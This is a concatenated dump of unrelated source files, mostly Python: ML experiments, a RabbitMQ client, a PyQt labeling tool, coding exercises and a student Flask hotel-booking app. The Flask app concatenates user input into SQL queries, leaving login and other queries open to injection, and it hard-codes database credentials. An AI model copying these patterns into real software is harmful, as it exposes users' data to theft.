+{"seq_id":"420421948","text":"#! 
/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Date: 2017/11/30\n\n\"\"\"\n 命名元组\n\"\"\"\n\nfrom collections import namedtuple\n\n\n# demo1\n# subscriber = namedtuple(\"Subscriber\", [\"addr\", \"joined\"])\n#\n# sub = subscriber(\"jonesy@example.com\", \"2012-10-19\")\n#\n# print(type(sub), )\n\n\n# demo2\nstock = namedtuple(\"Stock\", [\"name\", \"shares\", \"price\"])\n\n\ndef compute_cost(records):\n total = 0.0\n for rec in records:\n s = stock(*rec)\n total += s.shares * s.price\n\n return total\n\nprint(compute_cost([(\"tom\", 11, 123)]))\n\n\n","sub_path":"20171130/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"169189946","text":"import numpy as np\nimport ray\nfrom ray import tune\nfrom ray.rllib.agents.trainer_template import build_trainer\nfrom ray.tune.registry import register_env\n\nfrom hotrl import EXPERIMENTS_DIR\nfrom hotrl.envs.house import House\nfrom hotrl.envs.house_logger import HouseLogger\nfrom hotrl.envs.wrappers import FullyObsWrapper\nfrom hotrl.rllib_experiments.trainables import MaintenancePolicy\n\nsize = 4\ninside_temp = 15.\noutside_temp = 5.\n\nenv_config = dict(\n size=size,\n homies_params=[{'initial_room': 'Bedroom'}],\n temperatures=np.pad(\n np.full((size - 2, size - 2), fill_value=inside_temp),\n pad_width=[(1, 1), (1, 1)],\n mode='constant',\n constant_values=outside_temp\n ),\n heat_model_config=dict(\n RSI=4.2 * 2,\n heater_output=1000,\n ),\n homie_reward_scaler=tune.function(lambda x: x ** 5 if x < 1 else x),\n)\n\nregister_env(\"House\", lambda config: FullyObsWrapper(House(**config)))\nray.init(\n local_mode=True,\n)\n\ntrials = tune.run(\n # run_or_experiment=dqn_train,\n run_or_experiment=build_trainer(\n name=\"MaintenanceTrainer\",\n default_policy=MaintenancePolicy),\n loggers=[HouseLogger],\n verbose=1,\n local_dir=EXPERIMENTS_DIR,\n config={\n \"model\" : {\n # List of [out_channels, kernel, stride] for each filter\n \"conv_filters\": [\n [2, [4, 4], 1]\n ],\n },\n \"env\" : \"House\",\n \"env_config\": env_config\n },\n)\n","sub_path":"dqn_learning.py","file_name":"dqn_learning.py","file_ext":"py","file_size_in_byte":1481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"579131586","text":"from __future__ import unicode_literals\n\nfrom reviewboard.extensions.packaging import setup\n\n\nPACKAGE = \"{{extension_name}}\"\nVERSION = \"0.1\"\n\nsetup(\n name=PACKAGE,\n version=VERSION,\n description=\"{{description}}\",\n author=\"{{author}}\",\n packages=[\"{{package_name}}\"],\n entry_points={\n 'reviewboard.extensions':\n '%s = {{package_name}}.extension:{{class_name}}' % PACKAGE,\n },\n package_data={\n b'{{package_name}}': [\n 'templates/{{package_name}}/*.txt',\n 'templates/{{package_name}}/*.html',\n ],\n }\n)\n","sub_path":"contrib/tools/templates/extensions/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"112966556","text":"\n# coding: utf-8\n\n# ##### Linear Regression\n\n# #### Libraries\n\n# In[24]:\n\n\nget_ipython().run_line_magic('matplotlib', 'inline')\n\nimport numpy as np\nimport pandas as pd\nimport statsmodels.api as sm\nfrom sklearn import datasets\nimport statsmodels.stats.api as sms\nimport matplotlib.pyplot as plt\nfrom statsmodels.compat import lzip\nimport statsmodels.formula.api as smf\n\n\n# #### 
Data\n\n# In[2]:\n\n\ndata = datasets.load_boston()\ndf = pd.DataFrame(data.data, columns=data.feature_names)\ntarget = pd.DataFrame(data.target, columns=[\"MEDV\"])\n\n\n# #### Regression\n\n# In[4]:\n\n\nX = df[\"RM\"]\nX = sm.add_constant(X)\ny = target[\"MEDV\"]\nmodel = sm.OLS(y, X)\nresults = model.fit()\nprint(results.summary())\n\n\n# ##### Predictions\n\n# In[21]:\n\n\npredictions = results.predict(X)\npredictions\n\n\n# ##### Parameters\n\n# In[5]:\n\n\nresults.params\n\n\n# #### R-Squared\n\n# In[6]:\n\n\nresults.rsquared\n\n\n# #### Normality Tests\n\n# In[10]:\n\n\nname = ['Jarque-Bera', 'Chi^2 two-tail prob.', 'Skew', 'Kurtosis']\ntest = sms.jarque_bera(results.resid)\nlzip(name, test)\n\n\n# In[11]:\n\n\nname = ['Chi^2', 'Two-tail probability']\ntest = sms.omni_normtest(results.resid)\nlzip(name, test)\n\n\n# #### Influence Tests\n\n# In[12]:\n\n\nfrom statsmodels.stats.outliers_influence import OLSInfluence\ntest_class = OLSInfluence(results)\ntest_class.dfbetas[:5,:]\n\n\n# In[14]:\n\n\nfrom statsmodels.graphics.regressionplots import plot_leverage_resid2\nfig, ax = plt.subplots(figsize=(10,8))\nfig = plot_leverage_resid2(results, ax = ax)\n\n\n# #### Multicollinearity\n\n# In[15]:\n\n\nnp.linalg.cond(results.model.exog)\n\n\n# #### Heteroskedasticity Tests\n\n# ##### Breusch Pagan Test\n\n# In[17]:\n\n\nname = ['Lagrange multiplier statistic', 'p-value', \n 'f-value', 'f p-value']\ntest = sms.het_breuschpagan(results.resid, results.model.exog)\nlzip(name, test)\n\n\n# ##### Goldfeld Quandt Test\n\n# In[18]:\n\n\nname = ['F statistic', 'p-value']\ntest = sms.het_goldfeldquandt(results.resid, results.model.exog)\nlzip(name, test)\n\n\n# #### Harvey Collier Multiplier Test\n\n# In[19]:\n\n\nname = ['t value', 'p value']\ntest = sms.linear_harvey_collier(results)\nlzip(name, test)\n\n\n# #### Influence Plots\n\n# In[21]:\n\n\nfig, ax = plt.subplots(figsize=(12,8))\nfig = sm.graphics.influence_plot(results, ax=ax, criterion=\"cooks\")\n\n","sub_path":"Python/linear-regression/linear_regression.py","file_name":"linear_regression.py","file_ext":"py","file_size_in_byte":2228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"40562210","text":"from dataclasses import dataclass, asdict\nfrom typing import Optional\n\nfrom galaxy.api.types import Achievement\n\nfrom cache import Cache\n\n\n@dataclass\nclass Fingerprint:\n time_played: int\n last_played_time: Optional[int]\n\n\ndef as_dict(cache: Cache) -> dict:\n dict_ = {}\n for key, achievements, fingerprint in cache:\n achievements = [asdict(achievement) for achievement in achievements]\n dict_[key] = {\n \"achievements\": achievements,\n \"fingerprint\": asdict(fingerprint)\n }\n return dict_\n\n\ndef from_dict(dict_: dict) -> Cache:\n cache = Cache()\n for key, value in dict_.items():\n try:\n achievements = value[\"achievements\"]\n achievements = [Achievement(**achievement) for achievement in achievements]\n fingerprint = value[\"fingerprint\"]\n fingerprint = Fingerprint(**fingerprint)\n except (KeyError, TypeError, AssertionError) as error:\n raise ValueError(\"Failed to deserialize cache from dictionary\") from error\n cache.update(key, achievements, fingerprint)\n return cache\n","sub_path":"src/achievements_cache.py","file_name":"achievements_cache.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"71491789","text":"\"\"\" Conecta a RabbitMQ usando protocolo TLS 
\"\"\"\nimport ssl\nimport pika\n\nclass RabbitMQ():\n \"\"\" Conecta a RabbitMQ \"\"\"\n\n @classmethod\n def __init__(cls):\n \"\"\" Establece conexion con RabbitMQ \"\"\"\n cls.cxt = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)\n cls.ssl_options = pika.SSLOptions(\n context=cls.cxt,\n server_hostname=\"HOST_NAME\"\n )\n cls.credentials = pika.PlainCredentials('USER', 'PASSWORD')\n cls.parameters = pika.ConnectionParameters(\n 'HOST',\n 'PORT',\n 'VIRTUAL_HOST',\n cls.credentials,\n ssl_options=cls.ssl_options)\n cls.connection = pika.BlockingConnection(cls.parameters)\n cls.channel = cls.connection.channel()\n\n @classmethod\n def send_message(cls):\n \"\"\" Envia Mensaje a RabbitMQ \"\"\"\n cls.channel.basic_publish(\n exchange='EXCHANGE',\n routing_key='ROUTING_KEY',\n body='Hello World!')\n print(\" [x] Sent 'Hello World!'\")\n\n @classmethod\n def disconnect(cls):\n \"\"\" Cierra la conexión con RabbitMQ \"\"\"\n cls.connection.close()\n\nif __name__ == \"__main__\":\n RabbitMQ().send_message()\n","sub_path":"rabbitmq.py","file_name":"rabbitmq.py","file_ext":"py","file_size_in_byte":1210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"567746419","text":"from flask_mysqldb import MySQL\r\n#from codes.DatabaseUtil import InitializeData\r\nfrom flask import Flask, flash, redirect, render_template, request, session, abort, jsonify, url_for\r\n#from flask_login import login_user\r\nimport os\r\nimport sys\r\n\r\napp = Flask(__name__)\r\n\r\napp.config['MYSQL_HOST'] = 'dijkstra.ug.bcc.bilkent.edu.tr'\r\napp.config['MYSQL_USER'] = 'sena.yilmaz'\r\napp.config['MYSQL_PASSWORD'] = '97hws1Lr'\r\napp.config['MYSQL_DB'] = 'sena_yilmaz'\r\n\r\nmysql = MySQL(app)\r\n\r\n@app.route('/')\r\n@app.route('/indexpage')\r\ndef indexpage():\r\n\treturn render_template('index.html')\r\n\r\n@app.route('/loginpage', methods=[\"GET\", \"POST\"])\r\ndef loginpage():\r\n data = []\r\n if (request.method == 'POST'):\r\n\t username = request.form['username']\r\n\t password = request.form['password']\r\n\r\n\t cur = mysql.connection.cursor()\r\n\t cur.execute(\"select * from Hotel_Users where username='\" + username + \"' and password='\" + password + \"'\")\r\n \r\n for row in cur :\r\n data.append(row)\r\n\r\n if (len(data)>0):\r\n user_id = data[0]\r\n session['user_id'] = user_id[0]\r\n return redirect(url_for('guesthomepage'))\r\n\r\n else:\r\n flash(\"Error\")\r\n return render_template('wronglogin.html')\r\n\r\n@app.route('/registerpage', methods=[\"GET\", \"POST\"])\r\ndef registerpage():\r\n\tif request.method == 'GET':\r\n\t\treturn render_template('register.html')\r\n\telse:\r\n\t\tusername = request.form['username']\r\n\t\tpassword = request.form['password']\r\n\t\tbdate = request.form['bdate']\r\n\t\tgender = request.form['gender']\r\n\t\taddress = request.form['address']\r\n\r\n\t\tcur = mysql.connection.cursor()\r\n\t\tcur.execute(\"INSERT INTO Hotel_Users (username, password, bdate, gender, address) VALUES ('\" + username + \"','\" + password + \"','\" + bdate + \"','\" + gender + \"','\" + address + \"')\")\r\n\t\tmysql.connection.commit()\r\n\r\n\t\treturn render_template('index.html')\r\n\r\n@app.route('/guesthomepage', methods=[\"GET\", \"POST\"])\r\ndef guesthomepage():\r\n\tuser_id = session['user_id']\r\n\tif request.method == 'GET':\r\n\r\n\t\tcur = mysql.connection.cursor()\r\n\t\tcur.execute(\"select * from Reservation where user_ID='\" + str(user_id) + \"'\")\r\n\t\tdata = cur.fetchall()\r\n\t\tcur.execute(\"select username from 
Hotel_Users where user_ID='\" + str(user_id) + \"'\")\r\n\t\tname = cur.fetchone()\r\n\r\n\t\treturn render_template('guesthomepage.html', data=data, name=name)\r\n\r\n@app.route('/bookreservationpage', methods=[\"GET\", \"POST\"])\r\ndef bookreservationpage():\r\n\tif request.method == 'GET':\r\n\t\treturn render_template('bookreservation.html')\r\n\telse:\r\n\t\tcheck_in_date = request.form['check_in_date']\r\n\t\tcheck_out_date = request.form['check_out_date']\r\n\t\tnumOfStayers = request.form['numOfStayers']\r\n\r\n\t\tcur = mysql.connection.cursor()\r\n\t\t#price = ((check_out_date - check_in_date).days )*(numOfStayers*150)\r\n\t\tuser_id = session['user_id']\r\n\t\tprice = 3000\r\n\t\tcur.execute(\"INSERT INTO Reservation (reservation_date, check_in_date, check_out_date, numOfStayers, price, user_ID) VALUES (CURDATE(), '\" + check_in_date + \"','\" + check_out_date + \"','\" + str(numOfStayers) + \"', '\" + str(price) + \"', '\" + str(user_id) + \"')\")\r\n\t\tmysql.connection.commit()\r\n\r\n\t\treturn redirect(url_for('guesthomepage'))\r\n\r\n\r\n@app.route('/foodorders', methods=[\"GET\", \"POST\"])\r\ndef foodorders():\r\n\tuser_id = session['user_id']\r\n\torderdata =[]\r\n\tfooddata = []\r\n\tif request.method == 'GET':\r\n\t\tcur = mysql.connection.cursor()\r\n\t\tcur.execute(\"select order_id,order_date,food_id from Orders where user_ID='\" + str(user_id) + \"'\")\r\n\t\torders = cur.fetchall()\r\n\t\treturn render_template('foodorders.html', orders=orders)\r\n\t\r\n\telse:\r\n\t\torderid = request.form['selectedorderid']\r\n\t\tcur = mysql.connection.cursor()\r\n\t\tcur.execute(\"select order_date,food_id from Orders where order_id='\" + str(orderid) + \"'\")\r\n\r\n\t\tfor row in cur:\r\n\t\t\torderdata.append(row)\r\n\t\torderdate = orderdata[0][0]\r\n\t\tfoodid = orderdata[0][1]\r\n\r\n\t\tcur.execute(\"SELECT restaurant_id,food_name,food_price from Food where food_id='\" + str(foodid) + \"'\")\r\n\t\tfor row in cur:\r\n\t\t\tfooddata.append(row)\r\n\t\t\r\n\t\trestaurantID = fooddata[0][0]\r\n\t\tfoodName = fooddata[0][1]\r\n\t\tfoodPrice = fooddata[0][2]\r\n\t\treturn render_template('fooddetails.html', orderdate = orderdate, restaurantID = restaurantID, foodName=foodName, foodPrice=foodPrice )\r\n\r\n\r\n@app.route('/newfoodorder', methods=[\"GET\", \"POST\"])\r\ndef newfoodorder():\r\n\tuser_id = session['user_id']\r\n\tif request.method == 'GET':\r\n\t\tcur = mysql.connection.cursor()\r\n\t\tcur.execute(\"select food_id,food_name,food_price from Food where restaurant_id='\" + str(1) + \"'\")\r\n\t\trestaurant1 = cur.fetchall()\r\n\t\tcur.execute(\"select food_id,food_name,food_price from Food where restaurant_id='\" + str(2) + \"'\")\r\n\t\trestaurant2 = cur.fetchall()\r\n\t\tcur.execute(\"select food_id,food_name,food_price from Food where restaurant_id='\" + str(3) + \"'\")\r\n\t\trestaurant3 = cur.fetchall()\r\n\r\n\t\treturn render_template('newfoodorder.html', restaurant1=restaurant1,restaurant2=restaurant2,restaurant3=restaurant3 )\r\n\r\n\telse:\r\n\t\tfoodid = request.form['selectedfoodid']\r\n\t\tcur = mysql.connection.cursor()\r\n\t\tcur.execute(\"INSERT INTO Orders (order_date, user_ID, food_id) VALUES (\" + \"CURDATE()\" + \",'\" + str(user_id) +\"','\"+str(foodid) +\"')\")\r\n\t\tmysql.connection.commit()\r\n\t\treturn redirect(url_for('guesthomepage'))\r\n\r\n\r\n\r\n@app.route('/buyticket', methods=[\"GET\", \"POST\"])\r\ndef buyticket():\r\n\tif request.method == 'GET':\r\n\t\treturn render_template('buyticket.html')\r\n\r\n@app.route('/shopping', 
methods=[\"GET\", \"POST\"])\r\ndef shopping():\r\n\tif request.method == 'GET':\r\n\t\treturn render_template('shopping.html')\r\n\r\n\r\n@app.route('/leavecomment', methods=[\"GET\", \"POST\"])\r\ndef leavecomment():\r\n\tif request.method == 'GET':\r\n\t\treturn render_template('leavecomment.html')\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\tapp.secret_key = os.urandom(16)\r\n\tapp.run(debug=True)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"333641469","text":"import json\n\nfrom app.api.parties.party_appt.models.mine_party_appt_type import MinePartyAppointmentType\n\n\n# GET\ndef test_get_mine_party_appt_type(test_client, db_session, auth_headers):\n get_resp = test_client.get(\n '/parties/mines/relationship-types', headers=auth_headers['full_auth_header'])\n get_data = json.loads(get_resp.data.decode())\n assert get_resp.status_code == 200\n assert len(get_data) == len(MinePartyAppointmentType.get_all())\n","sub_path":"services/core-api/tests/parties/party_appt/resources/test_mine_party_appt_type_resource.py","file_name":"test_mine_party_appt_type_resource.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"629654122","text":"# coding: utf-8\n \nimport sys, os\nimport numpy as np\nfrom PyQt5 import QtWidgets\nfrom PyQt5 import QtGui\nfrom PyQt5 import uic\nfrom PyQt5 import QtCore, Qt\nfrom PyQt5.QtCore import pyqtSlot\nfrom PyQt5.QtGui import QPixmap, QPainter\nfrom PyQt5.QtWidgets import QFileDialog, QCheckBox, QBoxLayout, QGridLayout\n \nclass Form(QtWidgets.QDialog):\n def __init__(self, parent=None):\n QtWidgets.QDialog.__init__(self, parent)\n self.ui = uic.loadUi(\"label_check.ui\", self)\n self.ui.show()\n \n # self.box_painter = QPainter(self)\n \n self.i = 1\n self.bool = False\n self.first = True\n self.box_count = False\n self.drawbox_line_split = \"\"\n self.box_create = False\n \n @pyqtSlot()\n def nextimage(self):\n if self.first is True:\n # self.i = self.i + 1\n self.loadimage()\n self.showimage()\n # self.saveimage()\n # self.i = self.i + 1\n self.drawbox()\n self.first = False\n else :\n self.saveimage()\n self.i = self.i + 1\n self.loadimage()\n if self.pixmap.width() is not 0 :\n self.showimage()\n self.drawbox()\n # self.saveimage()\n # self.i = self.i + 1\n else :\n self.textBrowser.setText(\"마지막 사진\")\n return\n self.textBrowser.setText(\"저장 완료\")\n \n @pyqtSlot()\n def pass_image(self):\n if self.i is 1:\n self.drawbox()\n self.loadimage()\n self.showimage()\n self.i = self.i + 1\n self.first = False\n else :\n self.drawbox()\n self.loadimage()\n if self.pixmap.width() is not 0 :\n self.showimage()\n self.i = self.i + 1\n else :\n self.textBrowser.setText(\"마지막 사진\")\n self.i = self.i - 1\n return\n if self.box_create is True :\n os.remove(self.drawbox_save_name)\n self.textBrowser.setText(\"저장하지 않음\")\n self.box_create = False\n\n @pyqtSlot()\n def image_load(self):\n # self.fname = QFileDialog.getOpenFileName(self)\n self.img_dir_name = QFileDialog.getExistingDirectory(self)\n self.img_file_path = QFileDialog.getOpenFileName(self)\n self.img_file_name = self.img_file_path[0].replace(self.img_dir_name+\"/\",\"\")\n # print(self.img_file_name)\n # self.img_file_name = self.img_file_name.replace(\"1.jpg\",\"\")\n \n print(\"이미지 이름 및 확장자 :\",self.img_file_name)\n print(\"이미지 경로 :\",self.img_file_path[0])\n self.img_file = 
self.img_file_name.split(\".\")\n self.img_file_ext = self.img_file[1]\n print(\"이미지 확장자 :\",self.img_file_ext)\n self.img_file_name_only = self.img_file[0][:-1]\n print(\"이미지 이름 :\",self.img_file_name_only)\n self.img_file_num_only = self.img_file[0][-1:]\n print(\"이미지 번호 :\",self.img_file_num_only)\n self.i = int(self.img_file_num_only)\n self.txt_image_load.setText(self.img_file_path[0])\n self.textBrowser.setText(self.img_file_name)\n\n @pyqtSlot()\n def box_file_load(self):\n self.box_file_dir_name = QFileDialog.getExistingDirectory(self)\n self.box_file_path = QFileDialog.getOpenFileName(self)\n self.box_file_name = self.box_file_path[0].replace(self.box_file_dir_name+\"/\",\"\")\n print(\"박스 파일 이름 및 확장자 : \",self.box_file_name)\n print(\"박스 파일 경로 :\",self.box_file_path[0])\n self.box_file = self.box_file_name.split(\".\")\n self.box_file_ext = self.box_file[1]\n print(\"박스 파일 확장자 :\",self.box_file_ext)\n self.box_file_name_only = self.box_file[0][:-1]\n print(\"박스 파일 이름 :\",self.box_file_name_only)\n self.box_file_num_only = self.box_file[0][-1:]\n print(\"박스 파일 번호 :\",self.box_file_num_only)\n \n # self.box_file_name = self.box_file_name.replace(\"1.txt\",\"\")\n # self.txt_image_load.setText(self.box_file_path[0])\n\n\n @pyqtSlot()\n def box_load(self):\n # self.fname = QFileDialog.getOpenFileName(self)\n # self.box_dir_name = QFileDialog.getExistingDirectory(self)\n self.box_file_name = QFileDialog.getOpenFileName(self,'',\"\")\n self.txt_box_text.setText(self.box_file_name[0])\n f = open(self.box_file_name[0], 'r')\n self.flines = f.readlines()\n\n self.grid = np.zeros((len(self.flines),1))\n if len(self.flines) > 0 :\n self.textBrowser.setText(\"Classes : \"+str(len(self.flines)))\n # self.grid_layout = QGridLayout()\n # self.setLayout(self.grid_layout)\n # print(len(flines))\n for i in range(len(self.flines)):\n self.btn = QCheckBox(self.flines[i])\n # self.btn.move(50*i, 1)\n self.grid_layout.addWidget(self.btn,i,0)\n self.btn.stateChanged.connect(self.click)\n\n else :\n print(\"No such file\")\n\n f.close()\n\n def click(self, state) :\n self.ischeck_count = 0\n if state == Qt.Qt.Checked :\n for i in range(len(self.flines)):\n item = self.grid_layout.itemAtPosition(i,0)\n widget = item.widget()\n self.grid[i][0] = widget.isChecked()\n # print(self.grid[i][0])\n\n if self.grid[i][0] > 0 :\n self.ischeck_count = self.ischeck_count + 1\n # print(self.ischeck_count)\n if self.ischeck_count > 1 :\n for i in range(len(self.flines)):\n item = self.grid_layout.itemAtPosition(i,0)\n widget = item.widget()\n self.grid[i][0] = widget.setChecked(False)\n self.grid[i][0] = 0\n else :\n for i in range(len(self.flines)):\n item = self.grid_layout.itemAtPosition(i,0)\n widget = item.widget()\n self.grid[i][0] = widget.isChecked()\n self.ischeck_count = 0\n pass\n\n # print(self.grid)\n\n @pyqtSlot()\n def origin_image(self):\n self.origin_img_dir_name = QFileDialog.getExistingDirectory(self)\n self.origin_img_path = QFileDialog.getOpenFileName(self)\n self.origin_img_name = self.origin_img_path[0].replace(self.origin_img_dir_name+\"/\",\"\")\n print(\"원본 이미지 이름 및 확장자 :\", self.origin_img_name)\n print(\"원본 이미지 경로 :\",self.origin_img_path[0])\n self.origin_img_file = self.origin_img_name.split(\".\")\n print(\"원본 이미지 확장자 :\",self.origin_img_file[1])\n self.origin_img_file_ext = self.origin_img_file[1]\n self.origin_img_file_name = self.origin_img_file[0][:-1]\n self.origin_img_file_num = self.origin_img_file[0][-1:]\n print(\"원본 이미지 이름 :\",self.origin_img_file_name)\n print(\"원본 이미지 번호 
:\",self.origin_img_file_num)\n # self.origin_img_name = self.origin_img_name.replace(\".txt\",\"\")\n\n @pyqtSlot()\n def image_save(self):\n self.img_save_path = QFileDialog.getExistingDirectory(self)\n self.txt_save_path.setText(self.img_save_path)\n\n @pyqtSlot()\n def success(self):\n self.img_save_name = self.txt_save_name.text()\n # self.txt_save_name.clear()\n self.txt_save_name.setText(self.img_save_name)\n # print(self.img_save_name)\n \n @pyqtSlot()\n def next_box(self):\n for i in range(len(self.flines)):\n item = self.grid_layout.itemAtPosition(i,0)\n widget = item.widget()\n if widget.isChecked() :\n self.checkbox_i = i\n self.grid[i][0] = widget.setChecked(False)\n self.grid[i][0] = 0\n \n if self.box_count is True:\n self.drawbox_save_name = self.img_save_path+\"/\"+self.img_save_name+str(self.i)+\".txt\"\n f_save_box = open(self.drawbox_save_name, 'a')\n # print(str(self.checkbox_i)+\" \"+str(self.drawbox_line_split[1])+\" \"+str(self.drawbox_line_split[2])+\" \"+str(self.drawbox_line_split[3])+\" \"+str(self.drawbox_line_split[4])+\"\\n\")\n f_save_box.write(str(self.checkbox_i)+\" \"+str(self.drawbox_line_split[1])+\" \"+str(self.drawbox_line_split[2])+\" \"+str(self.drawbox_line_split[3])+\" \"+str(self.drawbox_line_split[4])+\"\\n\")\n f_save_box.close()\n self.box_create = True\n\n if self.drawbox_lines.__len__() is not 0:\n self.drawbox_line = self.drawbox_lines.pop()\n print(self.drawbox_line)\n # print(self.drawbox_line)\n self.drawbox_line = self.drawbox_line[:-2]\n # print(self.drawbox_line)\n self.drawbox_line_split = self.drawbox_line.split(' ')\n # print(self.drawbox_line_split)\n self.drawbox_center_x = self.pixmap.width() * self.pixmap_resize_width * float(self.drawbox_line_split[1])\n self.drawbox_center_y = self.pixmap.height() * self.pixmap_resize_height * float(self.drawbox_line_split[2])\n self.drawbox_width = self.pixmap.width() * self.pixmap_resize_width * float(self.drawbox_line_split[3])\n self.drawbox_height = self.pixmap.height() * self.pixmap_resize_height * float(self.drawbox_line_split[4])\n # print(self.drawbox_center_x, self.drawbox_center_y, self.drawbox_width, self.drawbox_height)\n self.box_edit.move(self.drawbox_center_x + (self.pixmap_resize_width*12) - (self.drawbox_width/2), self.drawbox_center_y + (self.pixmap_resize_height*76) - (self.drawbox_height/2))\n self.box_count = True\n else :\n print(\"박스정보 저장완료\\n박스가 더이상 존재하지않음\")\n self.box_count = False\n\n def drawbox(self):\n # print(\"d\")\n self.drawbox_file_name = self.box_file_dir_name+\"/\"+self.box_file_name_only+str(self.i)+\".\"+self.box_file_ext\n # self.drawbox_file_name = \"/home/kdh/ml/label_check/person\"+str(self.i)+\".txt\"\n f_box = open(self.drawbox_file_name, 'r')\n self.drawbox_lines = f_box.readlines()\n # print(\"뒤집기 전 :\\n\",self.drawbox_lines)\n self.drawbox_lines.reverse()\n # print(\"뒤집기 후 :\\n\",self.drawbox_lines)\n\n f_box.close()\n # self.pixmap = QPixmap(\"/home/kdh/ml/label_check/person\"+str(self.i)+\".txt\")\n # self.pixmap = QPixmap(self.img_dir_name+\"/\"+self.img_file_name+str(self.i)+\".txt\")\n \n \n def loadimage(self):\n self.label = self.label_image\n # self.pixmap = QPixmap(\"/home/kdh/ml/label_check/box_person\"+str(self.i)+\".jpg\")\n self.pixmap = QPixmap(self.img_dir_name+\"/\"+self.img_file_name_only+str(self.i)+\".\"+self.img_file_ext)\n # self.pixmap = QPixmap(self.img_dir_name+\"/\"+self.img_file_name)\n # print(\"불러오는 파일 경로 및 이름 :\",self.img_dir_name+\"/\"+self.img_file_name)\n print(\"불러오는 파일 경로 및 이름 
:\",self.img_dir_name+\"/\"+self.img_file_name_only+str(self.i)+\".\"+self.img_file_ext)\n\n \n def showimage(self):\n # self.label.setAlignment(Qt.Qt.AlignCenter)\n # self.label.setPixmap(self.pixmap.scaledToWidth(self.pixmap.scaledToHeight(self.label_image.height()).width()))\n self.pixmap_resize_height = self.pixmap.scaledToHeight(self.label_image.height()).height() / self.pixmap.height()\n self.pixmap_resize_width = self.pixmap.scaledToWidth(self.pixmap.scaledToHeight(self.label_image.height()).width()).width()/self.pixmap.width()\n print(self.pixmap_resize_height,\" \",self.pixmap_resize_width)\n self.label.setPixmap(self.pixmap.scaledToWidth(self.pixmap.scaledToHeight(self.label_image.height()).width()))\n # self.label.setPixmap(self.pixmap)\n\n def saveimage(self):\n # self.origin_pixmap = QPixmap(self.origin_img_dir_name+\"/\"+self.origin_img_name)\n self.origin_pixmap = QPixmap(self.origin_img_dir_name+\"/\"+self.origin_img_file_name+str(self.i)+\".\"+self.origin_img_file_ext)\n self.origin_pixmap.save(self.img_save_path+\"/\"+self.img_save_name+str(self.i)+\".png\")\n # print(\"저장할 원본이미지 경로 및 이름\",self.origin_img_dir_name+\"/\"+self.origin_img_name)\n print(\"저장할 원본이미지 경로 및 이름\",self.origin_img_dir_name+\"/\"+self.origin_img_file_name+str(self.i)+\".\"+self.origin_img_file_ext)\n print(\"저장 된 원본이미지 경로 및 이름\",self.img_save_path+\"/\"+self.img_save_name+str(self.i)+\".png\")\n # self.pixmap.save(\"/home/kdh/ml/label_check/newperson\"+str(self.i)+\".png\")\n\n\nif __name__ == '__main__':\n app = QtWidgets.QApplication(sys.argv)\n w = Form()\n sys.exit(app.exec())\n","sub_path":"label_check.py","file_name":"label_check.py","file_ext":"py","file_size_in_byte":12915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"297372493","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jun 2 23:26:04 2019\n\n@author: nirav\n\nDescription: Extra Long Factorials\n\"\"\"\n\n#!/bin/python3\n\nimport sys\n\n# Complete the diagonalDifference function below.\ndef findHappiness(n, a, b):\n \n tempN = n[:]\n tempNN = n[:]\n \n listA = list(set(n) - set(a))\n listB = list(set(n) - set(b))\n \n for i in range(0, len(listA)):\n for j in range(0, len(n)):\n if (listA[i] == n[j]) == True:\n tempN.remove(listA[i])\n \n for i in range(0, len(listB)):\n for j in range(0, len(n)):\n if (listB[i] == n[j]) == True:\n tempNN.remove(listB[i])\n \n print(len(tempN) - len(tempNN))\n\nif __name__ == '__main__':\n\n n = [1,5,3,3,3,8,8]\n a = [3,1]\n b = [5,7]\n \n findHappiness(n, a, b)\n \n\n","sub_path":"Problem Solving/extra_long_factorials.py","file_name":"extra_long_factorials.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"171030699","text":"#Runtime 52ms, Beats 50.95%\n# O(n)\n# Basic idea: iteratively search the whole nums list to find the maximum reachable range.\nclass Solution(object):\n def canJump(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: bool\n \"\"\"\n reach,i = 0,0\n while i<=reach and i=len(nums)-1 else False\n\n# Original idea of recursion: maximum recursion depth exceeded while calling a Python object\nclass Solution(object):\n def canJump(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: bool\n \"\"\"\n self.result = False\n self.search(nums,nums[0],0)\n return self.result\n\n def search(self,nums,cur_1,cur_2):\n while cur_1<=len(nums)-1 and nums[cur_1]!=0:\n cur_2 = cur_1\n cur_1 += nums[cur_1] \n 
